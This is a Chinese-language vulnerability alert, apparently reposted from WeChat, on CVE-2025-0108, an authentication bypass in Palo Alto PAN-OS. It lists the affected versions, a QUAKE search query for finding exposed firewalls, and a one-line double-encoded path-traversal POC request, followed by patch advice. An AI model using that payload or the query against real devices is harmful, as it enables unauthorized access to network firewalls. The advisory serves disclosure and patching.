先关注,不迷路.
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞介绍
PAN-OS 是运行 Palo Alto Networks 下一代防火墙的软件,Palo Alto Networks PAN-OS 软件中的身份验证绕过功能使未经身份验证的攻击者能够通过网络访问管理 Web 界面,从而绕过 PAN-OS 管理 Web 界面所需的身份验证并调用某些 PHP 脚本。虽然调用这些 PHP 脚本不会启用远程代码执行,但它可能会对 PAN-OS 的完整性和机密性产生负面影响。
漏洞编号
CVE-2025-0108
影响范围
PAN OS 11.2 < 11.2.4-h4
PAN OS 11.1 < 11.1.6-h1
PAN OS 10.2 < 10.2.13-h3
PAN OS 10.1 < 10.1.14-h9
搜索语法
QUAKE: app:"Palo Alto 网络防火墙"
漏洞复现
POC:
(这微信页面直接复制代码格式会乱,可以浏览器打开复制)
/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css
漏洞分析
https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/
修复意见
-
目前官方已有可更新版本,建议受影响用户升级至最新版本:https://security.paloaltonetworks.com/CVE-2025-0108 -
将对管理 Web 界面的访问限制为仅受信任的内部 IP 地址,可以大大降低此问题的风险
如有侵权,请及时联系删除。
原文始发于微信公众号(PokerSec):【漏洞预警】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论